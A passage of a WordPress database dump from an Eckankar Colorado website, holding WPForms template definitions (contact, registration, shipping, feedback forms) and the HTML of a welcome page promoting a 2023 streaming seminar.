submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Address Form (US)','','publish','closed','closed','','address-form-us','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=10',0,'wpforms','',0),(11,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":11,\"field_id\":5,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"Subject\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"Body\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Email Form (Traditional)\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Email Form (Traditional) submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Email Form (Traditional)','','publish','closed','closed','','email-form-traditional','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=11',0,'wpforms','',0),(12,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":12,\"field_id\":5,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"number\",\"label\":\"Group Size\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"Special Instructions\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Event Registration Form (Group Support)\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Register\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Event Registration Form (Group Support) submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Event Registration Form (Group Support)','','publish','closed','closed','','event-registration-form-group-support','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=12',0,'wpforms','',0),(13,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":13,\"field_id\":4,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"Special Instructions\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Event Registration Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Register\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Event Registration Form submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Event Registration Form','','publish','closed','closed','','event-registration-form','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=13',0,'wpforms','',0),(14,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":14,\"field_id\":5,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"text\",\"label\":\"ZIP / Postal Code\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Phone\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Information Request Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Information Request Form submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Information Request Form','','publish','closed','closed','','information-request-form','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=14',0,'wpforms','',0),(15,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":15,\"field_id\":17,\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"text\",\"label\":\"Company Name\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Street Address\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Address Line 2\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"text\",\"label\":\"City / Town\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"select\",\"label\":\"State\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"Select...\",\"value\":\"\"},\"5\":{\"label\":\"Alabama (AL)\",\"value\":\"AL\"},\"6\":{\"label\":\"Alaska (AK)\",\"value\":\"AK\"},\"7\":{\"label\":\"American Samoa (AS)\",\"value\":\"AS\"},\"8\":{\"label\":\"Arizona (AZ)\",\"value\":\"AZ\"},\"9\":{\"label\":\"Arkansas (AR)\",\"value\":\"AR\"},\"10\":{\"label\":\"California (CA)\",\"value\":\"CA\"},\"11\":{\"label\":\"Colorado (CO)\",\"value\":\"CO\"},\"12\":{\"label\":\"Connecticut (CT)\",\"value\":\"CT\"},\"13\":{\"label\":\"Delaware (DE)\",\"value\":\"DE\"},\"14\":{\"label\":\"Dist. of Columbia (DC)\",\"value\":\"DC\"},\"15\":{\"label\":\"Florida (FL)\",\"value\":\"FL\"},\"16\":{\"label\":\"Georgia (GA)\",\"value\":\"GA\"},\"17\":{\"label\":\"Guam (GU)\",\"value\":\"GU\"},\"18\":{\"label\":\"Hawaii (HI)\",\"value\":\"HI\"},\"19\":{\"label\":\"Idaho (ID)\",\"value\":\"ID\"},\"20\":{\"label\":\"Illinois (IL)\",\"value\":\"IL\"},\"21\":{\"label\":\"Indiana (IN)\",\"value\":\"IN\"},\"22\":{\"label\":\"Iowa (IA)\",\"value\":\"IA\"},\"23\":{\"label\":\"Kansas (KS)\",\"value\":\"KS\"},\"24\":{\"label\":\"Kentucky (KY)\",\"value\":\"KY\"},\"25\":{\"label\":\"Louisiana (LA)\",\"value\":\"LA\"},\"26\":{\"label\":\"Maine (ME)\",\"value\":\"ME\"},\"27\":{\"label\":\"Maryland (MD)\",\"value\":\"MD\"},\"28\":{\"label\":\"Marshall Islands (MH)\",\"value\":\"MH\"},\"29\":{\"label\":\"Massachusetts (MA)\",\"value\":\"MA\"},\"30\":{\"label\":\"Michigan (MI)\",\"value\":\"MI\"},\"31\":{\"label\":\"Micronesia (FM)\",\"value\":\"FM\"},\"32\":{\"label\":\"Minnesota (MN)\",\"value\":\"MN\"},\"33\":{\"label\":\"Mississippi (MS)\",\"value\":\"MS\"},\"34\":{\"label\":\"Missouri (MO)\",\"value\":\"MO\"},\"35\":{\"label\":\"Montana (MT)\",\"value\":\"MT\"},\"36\":{\"label\":\"Nebraska (NE)\",\"value\":\"NE\"},\"37\":{\"label\":\"Nevada (NV)\",\"value\":\"NV\"},\"38\":{\"label\":\"New Hampshire (NH)\",\"value\":\"NH\"},\"39\":{\"label\":\"New Jersey (NJ)\",\"value\":\"NJ\"},\"40\":{\"label\":\"New Mexico (NM)\",\"value\":\"NM\"},\"41\":{\"label\":\"New York (NY)\",\"value\":\"NY\"},\"42\":{\"label\":\"North Carolina (NC)\",\"value\":\"NC\"},\"43\":{\"label\":\"North Dakota (ND)\",\"value\":\"ND\"},\"44\":{\"label\":\"Northern Marianas (MP)\",\"value\":\"MP\"},\"45\":{\"label\":\"Ohio (OH)\",\"value\":\"OH\"},\"46\":{\"label\":\"Oklahoma (OK)\",\"value\":\"OK\"},\"47\":{\"label\":\"Oregon (OR)\",\"value\":\"OR\"},\"48\":{\"label\":\"Palau (PW)\",\"value\":\"PW\"},\"49\":{\"label\":\"Pennsylvania (PA)\",\"value\":\"PA\"},\"50\":{\"label\":\"Puerto Rico (PR)\",\"value\":\"PR\"},\"51\":{\"label\":\"Rhode Island (RI)\",\"value\":\"RI\"},\"52\":{\"label\":\"South Carolina (SC)\",\"value\":\"SC\"},\"53\":{\"label\":\"South Dakota (SD)\",\"value\":\"SD\"},\"54\":{\"label\":\"Tennessee (TN)\",\"value\":\"TN\"},\"55\":{\"label\":\"Texas (TX)\",\"value\":\"TX\"},\"56\":{\"label\":\"Utah (UT)\",\"value\":\"UT\"},\"57\":{\"label\":\"Vermont (VT)\",\"value\":\"VT\"},\"58\":{\"label\":\"Virginia (VA)\",\"value\":\"VA\"},\"59\":{\"label\":\"Virgin Islands (VI)\",\"value\":\"VI\"},\"60\":{\"label\":\"Washington (WA)\",\"value\":\"WA\"},\"61\":{\"label\":\"West Virginia (WV)\",\"value\":\"WV\"},\"62\":{\"label\":\"Wisconsin (WI)\",\"value\":\"WI\"},\"63\":{\"label\":\"Wyoming (WY)\",\"value\":\"WY\"},\"64\":{\"label\":\"Other\",\"value\":\"Other\"}},\"description\":\"\",\"required\":\"1\",\"show_values\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"text\",\"label\":\"ZIP / Postal Code\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"text\",\"label\":\"Country\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"16\":{\"id\":\"16\",\"type\":\"text\",\"label\":\"Phone\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Shipping Information Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Shipping Information Form submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Shipping Information Form','','publish','closed','closed','','shipping-information-form','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=15',0,'wpforms','',0),(16,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":16,\"field_id\":3,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Sign Up Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Sign Up\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Sign Up Form submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Sign Up Form','','publish','closed','closed','','sign-up-form','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=16',0,'wpforms','',0),(17,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":17,\"field_id\":9,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"On a scale of 1 to 5, how would you rate your experience with our product / service?\",\"choices\":{\"1\":{\"label\":\"1 (poor)\",\"value\":\"1\"},\"2\":{\"label\":\"2 (mediocre)\",\"value\":\"2\"},\"3\":{\"label\":\"3 (average)\",\"value\":\"3\"},\"4\":{\"label\":\"4 (fair)\",\"value\":\"4\"},\"5\":{\"label\":\"5 (excellent)\",\"value\":\"5\"}},\"description\":\"\",\"show_values\":\"1\",\"input_columns\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"radio\",\"label\":\"How likely are you to recommend our product / service to people you know?\",\"choices\":{\"1\":{\"label\":\"Likely\",\"value\":\"Likely\"},\"2\":{\"label\":\"Somewhat Likely\",\"value\":\"Somewhat Likely\"},\"3\":{\"label\":\"Somewhat Unlikely\",\"value\":\"Somewhat Unlikely\"},\"4\":{\"label\":\"Unlikely\",\"value\":\"Unlikely\"}},\"description\":\"\",\"show_values\":\"1\",\"input_columns\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"radio\",\"label\":\"Would you use our product / service in the future?\",\"choices\":{\"1\":{\"label\":\"Yes\",\"value\":\"Yes\"},\"2\":{\"label\":\"No\",\"value\":\"No\"}},\"description\":\"\",\"show_values\":\"1\",\"input_columns\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"select\",\"label\":\"How long have you used our product / service?\",\"choices\":{\"1\":{\"label\":\"Select...\",\"value\":\"\"},\"6\":{\"label\":\"Less than a month\",\"value\":\"Less than a month\"},\"2\":{\"label\":\"1 Month - 11 Months\",\"value\":\"1 Month - 11 Months\"},\"3\":{\"label\":\"1 Year - 2 Years\",\"value\":\"1 Year - 2 Years\"},\"5\":{\"label\":\"3 Years - 5 Years\",\"value\":\"3 Years - 5 Years\"},\"4\":{\"label\":\"Over 5 Years\",\"value\":\"Over 5 Years\"}},\"description\":\"\",\"show_values\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"textarea\",\"label\":\"Please tell us what you liked or disliked about our product / service\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"Additional Comments\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Customer Feedback Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Customer Feedback Form submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Customer Feedback Form','','publish','closed','closed','','customer-feedback-form','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=17',0,'wpforms','',0),(3649,2,'2019-07-04 03:18:20','2019-07-04 03:18:20','<iframe title=\"City at Night\" width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','','','publish','closed','closed','','1ad0fe5f0d83c4490e038e6c19bd9e3f','','','2019-07-04 03:18:20','2019-07-04 03:18:20','',0,'https://eckankar-colorado.org/1ad0fe5f0d83c4490e038e6c19bd9e3f/',0,'oembed_cache','',0),(7160,2,'2019-07-05 21:40:56','2019-07-06 03:40:56','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" 